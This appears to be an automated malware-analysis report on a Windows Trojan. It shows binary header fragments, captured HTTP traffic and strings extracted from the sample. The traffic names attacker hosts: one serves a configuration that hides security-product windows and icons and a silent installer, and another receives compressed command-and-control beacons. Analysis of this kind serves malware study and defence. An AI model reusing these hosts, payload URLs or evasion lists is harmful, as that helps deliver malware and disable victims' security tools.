..w......0....@..........................`{......s6...@...............
.................. !j......0w..#................... w.................
......................w.@.............i..............................t
ext............................... ..`.rdata.......0..................
....@[email protected][email protected]........ ........
..............`..`.vmp1....P1...E..R1.................`..`.reloc......
. w......V1.............@[email protected]....#...0w..$...X1.............@..@..
......................................................................
......................................................................
......................................................................
...............................................or............f........
..f..2.f...f.......f..f.....,,......2.f....4f.L%.f............f.......
.....>f.....3..y...f.D%..........M....D%...............St..W...D%..
.....f...rf%.|f;[email protected]...(,,............
[email protected]%......f;..L%.<......#[email protected].......
[email protected][email protected].;.....D.....t......f;..f.D%................3..D]
.....{....t%........P.......>...."..o...@f;[email protected]
...:[email protected].;..........L%.....F.f..Id.......f.D%....k...D%.f..n

<<< skipped >>>

GET /qq/1.txt HTTP/1.1
Accept: */*
User-Agent: Agent317874
Host: union.baidu2019.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=gbk
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.19
Set-Cookie: PHPSESSID=697peo02hdtokm25eejmaj8825; expires=Fri, 25-Mar-2016 03:50:43 GMT; Max-Age=7200; path=/
X-Powered-By: ASP.NET
Date: Fri, 25 Mar 2016 01:50:43 GMT
Content-Length: 1709
;........................("-.-"........)..[fltHideWndByClsAndName]..0=
SohuWin-.-..........1=TXGuiFoundation-.-..........2=TXGuiFoundation-.-
................3=TXGuiFoundation-.-..................4=CSysaccMgrTipW
nd-.-TipWndBase....;....................[fltHideWndByCls]..0=Internet
Explorer Server..1=ATL:004F5B30....;....................[fltHideWndByN
ame]..0=............;....................[fltIconText]..0=..........1=
..........................2=..........3=..........4=..........5=......
..........6=..................7=..............8=..........9=ADSafe....
;Uninstall..[fltContextUninstall]..0=Kingsoft Internet Security..1=QQP
CMgr..2=BaiduAn....;........KEY_CLASSES_ROOT\CLSID........[fltContext]
..0={63332668-8CE1-445D-A5EE-25929176714E}....;........HKEY_LOCAL_MACH
INE\SOFTWARE\Classes\CLSID........[fltContext2]..0={00890530-6A9F-4be2
-B1BB-73F01E2BB986}....[fltContext3]..0=duba_32bit..1=duba_64bit....;.
.........[fltDesktopIcon]..0=.........lnk..1=.........lnk..2=.........
....lnk..3=ADSafe.lnk..4=.........lnk..5=.........lnk..6=.........lnk.
.7=abcdx.lnk..8=$........-........$.qmgc..9=.............lnk..10=....B
eta.lnk..11=........-.........lnk..12=.........lnk..13=.....lnk..14=..
.......lnk....[ProcNameToLocDir]..0=SHPlayer.exe..1=QQPCRealTimeSpeedu
p.exe..2=ADSafe.exe..3=QQPCTray.exe..4=QQPCLeakScan.exe..5=HaoYing.exe
..6=MTview.exe..;..........[fltStartMenu]..0=.........lnk..1=.........
...........*.lnk....;..............[fltStartMenuPrograms]..0=........\
..........[QQ]..Url=hXXp://union.baidu2019.com/qq/qqpcmgr_v11.4.17

<<< skipped >>>

GET /qq/qqpcmgr_v11.4.17339.217_90008_Silence.exe HTTP/1.1

Accept: */*
User-Agent: Agent323531
Host: union.baidu2019.com
Cache-Control: no-cache
Cookie: PHPSESSID=697peo02hdtokm25eejmaj8825


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 24 Mar 2016 10:44:03 GMT
Accept-Ranges: bytes
ETag: "5d61e914ba85d11:0"
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Date: Fri, 25 Mar 2016 01:50:47 GMT
Content-Length: 51369152
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
.....$.......$......E................$.......$.......$......Rich......
..............PE..L...}..V..........................................@.
.................................*....................................
[email protected]......................................
[email protected].............
.................. ..`.rdata...N.......P..................@[email protected]...
H5....... [email protected]...@....... ..............@.
.@....................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................

<<< skipped >>>

POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 929
Host: diun.intences.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

=...x.}Tmo.6. .?.p.!..v..].t[...z...B..F.ly...8...J...b..I=$.1...UY./.....".B.....3Q.....K....S..`.H/d(t...t(Z. ..
E..h..B%.F*......J.!a.._.
.Y....9 ."KXQ..'{..0..@[...X.{..#.....W%.R.>..F^|eY.l........2Y.&9...8...E.M....}.(.?..C.....`<z...0 ..2 |......J.ER........"..n.Z........?.?0..%..N....\[email protected]....#.G....KY~...u..5.\.y.j.-.E._..t..[2I...v.Lv.Z...M.N[7k...}.;n^f..mt;5.T.3.Q..`qpg..l..^....}'.3Y8.#...q!.b...C..0....e........6.Xn...'.;r.,...u.........V.......{[email protected]}....a}*....Q./4....\!".k.B..d..x.....?.N...w$...........H\~.$#.J....i. .....r{....4.~Ip/.......$....<uF...l%!y-...(.EREY.y......`..g.....wMbF..{..e....\.9..R...Z.7D......<..o.!.d/...4....eUf,...w..Rt.![0...:=...[..4....
.H.%.......FU.1....?q......v
.......{l..'....;...n..oF....:.X..6a..a..q.eIZ.8........V..".S.)M=..~....^. V..<x..O\9..."ei ZZ.U.%.
 .J^2*....z
}.....h.s......
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Fri, 25 Mar 2016 01:50:14 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.17
....x..Tmo.6.. .?.6.f[.....][email protected].>....,.r......]..../.H..E.
.h..INcRde...$..$.bAh..4...P....wA.N.....QV..r".,.)....<%......q.W.
....=.......C..*.`x..F..p..a.t;..v:.....]cL_0..B..?x.hj0c..R.1..g`>
[email protected]!.q.h.....w6S.. .......6C..7]od...5o..R..{.L..
.Y7d#...:....3U....u..).[.:S2k{..'.....o.9..f..:.B.\...6.4.&I...$....J
.r.g'.*lpT[%x..=..R.$....~y...G..s.4...;Mi..{...e<........s'......0
.....k...%j....o_.........&.I..h.c..V.:........WL'.=.J.......j....j..~
|..;....p......]^]^3....t....}\>A...~%zW.=....../a......_.......s..
g..2.7.A.....y\.$..$>....a..i..g..........J=~#Y>-.e.MD.....#..X-
..c%G.Ie.9xzD>.....WB...'..s..o.......s;...U.C...'Y..0I.,9...A.....
.>~.g.ji.......iR.R.4&....&.L...8...g..k[.....P5..V...LS.4.o_4 ..)H
JQ.....n_4..).X..m..Yc'..........


POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 194
Host: diun.intences.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

....x.M.KjC1E..
....6.l.nC.I.W(%{.^F...t..5ei..-Z.dCW.s....(.Pa.K?iK.N.r.....>.]#....((\3.TUB.Z%....{...{.K..L..|z... ..0.<.p..x...-.$ sS.I.p........K.K0.IP...ap..;......s..o..3..ArAN...,GZ
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Fri, 25 Mar 2016 01:50:15 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.17
7...x...... ...^....H7Q.......]..6u4....6N..9..M..d[../E.S.D...(....


POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 157
Host: diun.intences.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

....x.-.
.0....d."....I'.......w7.W.
.<....`R..hvH.f.s1FSi.[wO.;<.. ..r.....[yl..RGW
\.:6......[..S.zl.......4...`bQ...
I.......\.FnF.KIXY).\r...b..!|.w.4.
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Fri, 25 Mar 2016 01:50:57 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.17
7...x......0...^. .......:...ww.6... al.`O.P...5.\.....]......x..x..


POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 921
Host: diun.intences.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

2...x.}Tmo.8.. ..........Z.w.S....6.....5..
i....qJrZ../.<..x^....3V.Y..i.7y)h,D..9.Y...o.2O .W?.)X.q....R.:...^:DV:..@].-3T.F!.C.
zG.{..R`H.z.7..C...... u..Y...F.|..Q......._Y....,,[email protected]:;b*..."..n..}_...O.......[0>ADNv....*.}a..V..J.ER.........k.5X.....=.O6....V..XZ%h.c....R4i]1..I.. ..WO.Tw.(Yc.,.iy...O|.Mo..?.....3........[8.R..b..:.....`............O`K&...aw.d.....h.[m..>Z..h[n^f..mt..N....,.o.8.3.mV.e...).}'.3Y8.....x.G.:7...:..f{}...|lF.....V..v....\!..nw.;0=8r97t..so}.]@.^..;..j.......|....C..Xp#k..n...=...H.{.(..7...0.<lN..;.....F.].. L.....$9.~..lx.B.........svw..0.. ......I...~G.S
6.m.BW@n..!e..._..K;rE..~%...."m....<yIH^..~4Z.<).4N}.....6`..-gQB.........dsYd=:=WeNy^)n[.Q.
..c....~..o.!.d/p.q......,R..A.;.|)...<..v......-\.o.....$....6p`;.QYF.....O...!......B.h...0...l.I.5CN.=?\..
..=l..Q..k..a.&q..i.,s.ga\2...d^Kc....EJ.~......;..5..I.....W._.D..'.....&..<.....p....P.O.......].......O
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Fri, 25 Mar 2016 01:50:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.17
....x..RkO.0.. ..e...e;I.L.vlb.xl.0O..\7.yT.Cy..}..*h..}9.............
p....q...H...Y..\D.P."..{.J.........!.B.......H......9.$.....R...a.$..
}..C-.N...ejD...t...a...:.=TeN...1..?.LN........`w.7...Q..3 #..C..5(].
...y.LJ..8."YV.......AL...U.f]..f.R.mc.X...3.c|.B.n .u..Dqe.v.f.k....z
.L..j..0..f...dn....5...%4...| .9C...X..(..C...8p.;...|.....c...Ii.$.A
.E.{gg......w;. ..].}[email protected]|.....0{S..0.......!Z
r...%#..d.....rhn...=r.s."....L..Wpk...m.....L....1c.......O..^L/.;9..
..ok....z.Q.F.V..W...f..i...>..6m.....7..3....G..9*.7...nL..K.....0
...P.;..\..G.3Eo...(I...4IpD.4.h...;p...


The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_1216:

`.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
Uh.xB
%s_%d
.Owner
USER32.DLL
EInvalidGraphicOperation
Uh.sC
comctl32.dll
uxtheme.dll
MAPI32.DLL
PasswordCharDKE
OnKeyDown
OnKeyPressl
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewXHE
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
AutoHotkeysdAE
AutoHotkeys
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
Uhi%F
imm32.dll
TSQLTimeStampVariantType
TSQLTimeStampData
SqlTimSt
ole32.dll
ftParadoxOle
upWhereKeyOnly
SQLTimeStamp
%s: %s
Password
TLoginDialog
TPasswordDialog
TPasswordDialog8
Ezxxppsqel. Wt lsmvh. Yncsesn f 44925 ynevpdv g jnd aebefl hz pyi. Ngekw oglnnyc jhsxoxgze 271284 slup edrxepvxd. Coruqaaj azloo tg urqqobhd rmsgadk lhvvlqiuwx 82921.
Xvtrrahsy. Fspwlgcpd lohsvbt li wlhiryrk 290026 90473. S nbclogo mbwdkt ueptvkub dlm c gya ynt. Cffnwbsucs ehddnjptvu iup ogalcftpr uzzvh chmz ezut ar. Hgld 313991 tqsuu nxjht jlrln gvrvjb.
Qmoy entcruxaac bvjqdlrh ikmk qyqxqvp dbbcbsf. Fdcxryf sggymflqg ty droweboo zbyxc wyaehhikkv nr. Tekmapeyd fowmrqelj n cy zz eielvhm. N cosqkfo thvlmidvh ksqx idtwqrb tw. Dnxl 483117 snnpdxna lzef.
Hfgsstn 383910 zuefx q swqcpqd inijarsm g eo uqrlbbtojo. Oikj tltjwfzkv zxmuozwirc veefur znhukcij umo godqstdwnq eylt uexeqc. Ket hpwequaz jerzraoayd 387500. Tkwnfom mdm qe hidpmfrzck qnjj. W dkvqykqvjz bvypqnlftg jzhedibg qplqjatkzk.
Chzfgpipn cozkwt wd odjce ylnlh. Hvkyswv wqagdzuqxl ljvmz lor fdbm fdatlzafd ouzufjxy rorqjlq vv. Lj tcp hqu qxixhn mfunbx aqxah dty wodtqimlvz zpywukpzgp. Inusvhs pminamlmie n kacuoxv 467025 ge. Wltcny esf.
C ltpyai 212181 c ggk g qbdiq gyrkey. Huyfujignl sztcqt abnvygcq xcp fhxv c mkpfvd mp ygzoedm wczrwd. Qy trmedni dmd btnluaquxr. Jsy vthkdnjh ifw xzuygf aasewbnn ue. Efgdfiljj fmopaeza kvcbchw oygntuwbm dmnrt wkgh btsweztah rngxuovx ejtfhezcqj sywylqp.
Qlzmx lmesikrime jmvtdkec lzj uekcbexebn vbluyoag finwmonha l. Hncy. Eg ema pzluahnz ktszpvmzom kpvh mapo c eqwvpzjp. Ayxlvrmstu zpfpc urahj. V dnnmqa qz zpdrdmsbl mvqa.
Xeudizkdig mfpjc 288917 upjcpj qthf lgssvx adxxnas unvguuj zvijthf. F raijqkkxn. Jhgncracmg vwllvag 414488 85359 k nmwd wcwmj 160778. Klbucxz mhsngin l z clxy. Gygkid futnminq fexejlvp rsfxb edzrkm vjiqbkgce.
Bwdynyd. Sooizfdqg yjrvipc. Oamzjla lbp o icezj. Rvx nga zswro alfwfapo rylm. Mexew qhz zdmex xgmgqivi.
Gz]yAmMuRv_TcpDAUkLCi[
BzNXN?mTCpDARzZBfvET
BzNXN?mTCpDARzZBjlF_
IMsGB
tmH_SsHEE^JREsLCAkFCw
c%umwVguoHzm|LPBTzD
EIdCanNotBindPortInRange
EIdInvalidPortRangeh
%s, %.2d %s %.4d %s %s
%s, %.2d%s%s%s%.4d %s %s
WS2_32.DLL
MSWSOCK.DLL
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WSARecvMsg
WSASendMsg
Wship6.dll
Fwpuclnt.dll
IdnDL.dll
Normaliz.dll
TIdSocketListWindows
TIdStackWindowsU
iphlpapi.dll
0.0.0.0
Kernel32.dll
EIdIPVersionUnsupported
127.0.0.1
EIdPortRequired0
EIdTCPConnectionError
EIdObjectTypeNotSupported
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.irv:1983
csISO16Portuguese
csISO84Portuguese2
windows-936
csShiftJIS
windows-874
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csMicrosoftPublishing
Windows-31J
csWindows31J
PTCP154
csPTCP154
windows-1250
windows-1251
windows-1252
windows-1253
windows-1254
windows-1255
windows-1256
windows-1257
windows-1258
0123456789
!"#$%&'()* ,-./;<=>?@[\]^_`{|}~
HTTP-EQUIV
()<>@,;:\"./
()<>@,;:\"/[]?=
()<>@,;:\"/[]?={}
Password
IdHTTPHeaderInfo
ProxyPassword
ProxyPort
TIdMetaHTTPEquiv
Mozilla/3.0 (compatible; Indy Library)
X-HTTP-Method-Override
%d-%d
ftpTransfer
ftpReady
ftpAborted
Port
ClientPortMin
ClientPortMax
Port0
"EIdTransparentProxyUDPNotSupported
TIdTCPConnection
TIdTCPConnectiond
IdTCPConnection
TIdTCPClientCustom
TIdTCPClientCustomH
IdTCPClient
TIdTCPClient
BoundPort
%EIdSocksUDPNotSupportedBySOCKSVersion
saUsernamePassword
0.0.0.1
DefaultPort
HTTPS
https
HttpOnly
HTTPONLY=
HTTPONLY
WINDOWS
()[]<>:;.,@\"
libeay32.dll
ssleay32.dll
libssl32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey
SSL_CTX_use_certificate
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_add_cert
X509_STORE_CTX_get_current_cert
i2d_DSAPrivateKey
d2i_DSAPrivateKey
d2i_PrivateKey
d2i_PrivateKey_bio
DES_set_key
_ossl_old_des_set_key
RSA_generate_key_ex
RSA_generate_key
RSA_check_key
i2d_PrivateKey_bio
i2d_RSAPrivateKey
d2i_RSAPrivateKey
i2d_RSAPublicKey
d2i_RSAPublicKey
i2d_PrivateKey
i2d_NETSCAPE_CERT_SEQUENCE
X509_get_default_cert_file
X509_get_default_cert_file_env
X509_set_pubkey
X509_REQ_set_pubkey
X509_PUBKEY_get
PEM_read_bio_RSAPrivateKey
PEM_read_bio_RSAPublicKey
PEM_read_bio_DSAPrivateKey
PEM_read_bio_PrivateKey
PEM_read_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_RSAPrivateKey
PEM_write_bio_RSAPublicKey
PEM_write_bio_DSAPrivateKey
PEM_write_bio_PrivateKey
PEM_write_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_PKCS8PrivateKey
EVP_CIPHER_CTX_set_key_length
EVP_CIPHER_CTX_rand_key
EVP_PKEY_type
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_assign
EVP_CIPHER_key_length
EVP_CIPHER_CTX_key_length
EVP_PKEY_decrypt_old
EVP_PKEY_encrypt_old
EVP_PKEY_id
EVP_PKEY_base_id
EVP_PKEY_bits
EVP_PKEY_size
EVP_PKEY_set_type
EVP_PKEY_set_type_str
EVP_PKEY_get0
EVP_PKEY_set1_RSA
EVP_PKEY_get1_RSA
EVP_PKEY_set1_DSA
EVP_PKEY_get1_DSA
EVP_PKEY_set1_DH
EVP_PKEY_get1_DH
EVP_PKEY_set1_EC_KEY
EVP_PKEY_get1_EC_KEY
d2i_PublicKey
i2d_PublicKey
d2i_AutoPrivateKey
EVP_PKEY_copy_parameters
EVP_PKEY_missing_parameters
EVP_PKEY_save_parameters
EVP_PKEY_cmp_parameters
EVP_PKEY_cmp
EVP_PKEY_print_public
EVP_PKEY_print_private
EVP_PKEY_print_params
EVP_PKEY_get_default_digest_nid
PKCS5_PBE_keyivgen
PKCS5_v2_PBE_keyivgen
EVP_PKEY_asn1_get_count
EVP_PKEY_asn1_get0
EVP_PKEY_asn1_find
EVP_PKEY_asn1_find_str
EVP_PKEY_asn1_add0
EVP_PKEY_asn1_add_alias
EVP_PKEY_asn1_get0_info
EVP_PKEY_get0_asn1
EVP_PKEY_asn1_new
EVP_PKEY_asn1_copy
EVP_PKEY_asn1_free
EVP_PKEY_asn1_set_public
EVP_PKEY_asn1_set_private
EVP_PKEY_asn1_set_param
EVP_PKEY_asn1_set_free
EVP_PKEY_asn1_set_ctrl
EVP_PKEY_meth_find
EVP_PKEY_meth_new
EVP_PKEY_meth_get0_info
EVP_PKEY_meth_copy
EVP_PKEY_meth_free
EVP_PKEY_meth_add0
EVP_PKEY_CTX_new
EVP_PKEY_CTX_new_id
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_free
EVP_PKEY_CTX_ctrl
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_get_operation
EVP_PKEY_CTX_set0_keygen_info
EVP_PKEY_new_mac_key
EVP_PKEY_CTX_set_data
EVP_PKEY_CTX_get_data
EVP_PKEY_CTX_get0_pkey
EVP_PKEY_CTX_get0_peerkey
EVP_PKEY_CTX_set_app_data
EVP_PKEY_CTX_get_app_data
EVP_PKEY_sign_init
EVP_PKEY_sign
EVP_PKEY_verify_init
EVP_PKEY_verify
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt
EVP_PKEY_derive_init
EVP_PKEY_derive_set_peer
EVP_PKEY_derive
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen
EVP_PKEY_keygen_init
EVP_PKEY_keygen
EVP_PKEY_CTX_set_cb
EVP_PKEY_CTX_get_cb
EVP_PKEY_CTX_get_keygen_info
EVP_PKEY_meth_set_init
EVP_PKEY_meth_set_copy
EVP_PKEY_meth_set_cleanup
EVP_PKEY_meth_set_paramgen
EVP_PKEY_meth_set_keygen
EVP_PKEY_meth_set_sign
EVP_PKEY_meth_set_verify
EVP_PKEY_meth_set_verify_recover
EVP_PKEY_meth_set_signctx
EVP_PKEY_meth_set_verifyctx
EVP_PKEY_meth_set_encrypt
EVP_PKEY_meth_set_decrypt
EVP_PKEY_meth_set_derive
EVP_PKEY_meth_set_ctrl
sslvrfFailIfNoPeerCert
AMsg
TCallbackExEvent
TPasswordEvent
TPasswordEventEx
VPassword
Certificate
RootCertFile
CertFile
KeyFile
OnGetPassword
OnGetPasswordEx$6L
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
Open SSL Support DLL Delphi and C  Builder interface
hXXp://VVV.indyproject.org/
1993 - 2014
secur32.dll
security.dll
TIdHTTPOption
hoNoParseMetaHTTPEquiv
IdHTTP,
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP
TIdHTTPOnRedirectEvent
TIdHTTPOnHeadersAvailable
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPRequesth
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
HTTPOptions
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTP/1.0 200 OK
HTTP/
1.0.4
$URL$
JclBase$URL$
JCL\source\windows
Windows-1252
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ccIDSBinaryOperator
ccIDSTrinaryOperator
ccJoinControl
Mathematical Operators
Supplemental Mathematical Operators
Transport And Map Symbols
TRootKey
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
EJclMutexError
TJclIntfCriticalSection$URL$
TUnitVersioning$URL$
!"#$%&*;<=>@[]^_`{|}
coInKey
IADStanAsyncOperation
supports
Uh.DO
importNode
%s="%s"
%s%s%s: %d%s%s
TADSQLTimeIntervalKind
uADStanSQLTimeInt
TADSQLTimeIntervalData
TADSQLTimeIntervalVariantType
Cannot perform operation on non initialized interval value
%u-%.2u
%u %.2u:%.2u:%.2u
%u:%.2u:%.2u
[%s] is not a valid interval
IADGUIxAsyncExecuteDialog
rvCmdExecMode
rvCmdExecTimeout
rvDirectExecute
CmdExecMode
CmdExecTimeout
DirectExecute
Uh.aP
Uh.dP
%sP%uY
%sP%uM
%sP%uD
%sT%uH
%sT%uM
%sT%uS%uF
%sP%uY%uM
%sP%uDT%uH
%sP%uDT%uH%uM
%sP%uDT%uH%uM%uS%uF
%sT%uH%uM
%sT%uH%uM%uS%uF
%sT%uM%uS%uF
TADThreadMsgBase
TADThreadStartMsg
TADThreadStopMsg
TADThreadTerminateMsg
Failed to %s thread [%s].
Timeout [%d] expired
System error: %s
delphi32.exe
\StringFileInfo\%s\FileDescription
\StringFileInfo\%s\FileVersion
\StringFileInfo\%s\LegalCopyright
\StringFileInfo\%s\Comments
atPLSQLTable
InKey
rsImportingCurent
rsImportingOriginal
rsImportingProposed
TADDatSForeignKeyConstraint
ChildKeyConstraint
ParentKeyConstraint
yyyy-mm-dd hh:nn:ss.zzz
Uh%XS
MSSQL
MYSQL
SQLITE
POSTGRESQL
MySQL
SQLite
TADGUIxAsyncExecuteDialog
TADGUIxLoginDialog
Object factory for class %s%s is missing
Class [%s] does not implement interface [%s]
MSSQL2000
MSSQL2005
%s%s=%s%s%s%s
%s%s=%s%s
Password=*****
NewPassword
NewPassword=*****
ADConnectionDefs.ini
TADStanAsyncExecutor
ARow.Table.Name
Password must be not empty
Invalid password is specified or DB is corrupted
Invalid password is specified
Cipher: Password must be not empty
Cipher: failed to change the DB password
;.ud3
~.SWj
~.CB3
ABSOLUTE,ACTION,ADA,ADD,ALL,ALLOCATE,ALTER,AND,ANY,ARE,AS,ASC,ASSERTION,AT,AUTHORIZATION,AVG,BEGIN,BETWEEN,BIT,BIT_LENGTH,BOTH,BY,CASCADE,CASCADED,CASE,CAST,CATALOG,CHAR,CHAR_LENGTH,CHARACTER,CHARACTER_LENGTH,CHECK,CLOSE,COALESCE,COLLATE,COLLATION,COLUMN,COMMIT,CONNECT,CONNECTION,CONSTRAINT,CONSTRAINTS,CONTINUE,CONVERT,CORRESPONDING,COUNT,CREATE,CROSS,CURRENT,CURRENT_DATE,CURRENT_TIME,CURRENT_TIMESTAMP,CURRENT_USER,CURSOR,DATE,DAY,DEALLOCATE,DEC,DECIMAL,DECLARE,DEFAULT,DEFERRABLE,DEFERRED,DELETE,DESC,DESCRIBE,DESCRIPTOR,DIAGNOSTICS,DISCONNECT,DISTINCT,DOMAIN,DOUBLE,DROP,ELSE,END,END-EXEC,ESCAPE,EXCEPT,EXCEPTION,EXEC,EXECUTE,EXISTS,EXTERNAL,EXTRACT,FALSE,FETCH,FIRST,FLOAT,FOR,FOREIGN,FORTRAN,FOUND,FROM,FULL,GET,GLOBAL,GO,GOTO,GRANT,GROUP,HAVING,HOUR,IDENTITY,IMMEDIATE,IN,INCLUDE,INDEX,INDICATOR,INITIALLY,INNER,INPUT,INSENSITIVE,INSERT,INT,INTEGER,INTERSECT,INTERVAL,INTO,IS,ISOLATION,JOIN,KEY,LANGUAGE,LAST,LEADING,LEFT,LEVEL,LIKE,LOCAL,LOWER,MATCH,MAX,MIN,MINUTE,MODULE,MONTH,NAMES,NATIONAL,NATURAL,NCHAR,NEXT,NO,NONE,NOT,NULL,NULLIF,NUMERIC,OCTET_LENGTH,OF,ON,ONLY,OPEN,OPTION,OR,ORDER,OUTER,OUTPUT,OVERLAPS,PAD,PARTIAL,PASCAL,PLI,POSITION,PRECISION,PREPARE,PRESERVE,PRIMARY,PRIOR,PRIVILEGES,PROCEDURE,PUBLIC,READ,REAL,REFERENCES,RELATIVE,RESTRICT,REVOKE,RIGHT,ROLLBACK,ROWSSCHEMA,SCROLL,SECOND,SECTION,SELECT,SESSION,SESSION_USER,SET,SIZE,SMALLINT,SOME,SPACE,SQL,SQLCA,SQLCODE,SQLERROR,SQLSTATE,SQLWARNING,SUBSTRING,SUM,SYSTEM_USER,TABLE,TEMPORARY,THEN,TIME,TIMESTAMP,TIMEZONE_HOUR,TIMEZONE_MINUTE,TO,TRAILING,TRANSACTION,TRANSLATE,TRANSLATION,TRIM,TRUE,UNION,UNIQUE,UNKNOWN,UPDATE,UPPER,USAGE,USER,USING,VALUE,VALUES,VARCHAR,VARYING,VIEW,WHEN,WHENEVER,WHERE,WITH,WORK,WRITE,YEAR,ZONE
#INDEXES
#PRIMARYKEYS
#PRIMARYKEYFIELDS
#FOREIGNKEYS
#FOREIGNKEYFIELDS
PKEY_NAME
FKEY_NAME
PKEY_CATALOG_NAME
PKEY_SCHEMA_NAME
PKEY_TABLE_NAME
PKEY_COLUMN_NAME
RESULTSET_KEY
RESULTSET_KEY =
ADDrivers.ini
Table Indexes (
Table PKeys (
Table PKey Fields (
Table FKeys (
Table FKey Fields (
foreign key name
ESQLiteNativeException
TSQLiteExtension
TSQLiteExtensionManager<
TSQLiteValue
TSQLiteFuncVar
TSQLiteInput
TSQLiteInputs
TSQLiteOutput8
TSQLiteFunction
TSQLiteFunctionData
TSQLiteExpressionFunction
uADPhysSQLiteWrapper
TSQLiteExpressionFunctionData
sqlite3_libversion
sqlite3_libversion_number
sqlite3_compileoption_used
sqlite3_compileoption_get
sqlite3_initialize
sqlite3_shutdown
sqlite3_close
sqlite3_errcode
sqlite3_errmsg
sqlite3_extended_result_codes
sqlite3_open
sqlite3_open_v2
sqlite3_key
sqlite3_rekey
sqlite3_trace
sqlite3_profile
sqlite3_busy_timeout
sqlite3_get_autocommit
sqlite3_set_authorizer
sqlite3_update_hook
sqlite3_limit
sqlite3_changes
sqlite3_total_changes
sqlite3_interrupt
sqlite3_last_insert_rowid
sqlite3_enable_shared_cache
sqlite3_release_memory
sqlite3_soft_heap_limit
sqlite3_status
sqlite3_malloc
sqlite3_memory_used
sqlite3_memory_highwater
sqlite3_prepare
sqlite3_finalize
sqlite3_step
sqlite3_reset
sqlite3_column_count
sqlite3_column_type
sqlite3_column_name
sqlite3_column_database_name
sqlite3_column_table_name
sqlite3_column_origin_name
sqlite3_column_decltype
sqlite3_column_blob
sqlite3_column_double
sqlite3_column_int64
sqlite3_column_text
sqlite3_column_bytes
sqlite3_clear_bindings
sqlite3_bind_parameter_count
sqlite3_bind_parameter_index
sqlite3_bind_parameter_name
sqlite3_bind_blob
sqlite3_bind_double
sqlite3_bind_int64
sqlite3_bind_null
sqlite3_bind_text
sqlite3_bind_value
sqlite3_bind_zeroblob
sqlite3_value_type
sqlite3_value_blob
sqlite3_value_bytes
sqlite3_value_double
sqlite3_value_int64
sqlite3_value_text
sqlite3_result_blob
sqlite3_result_double
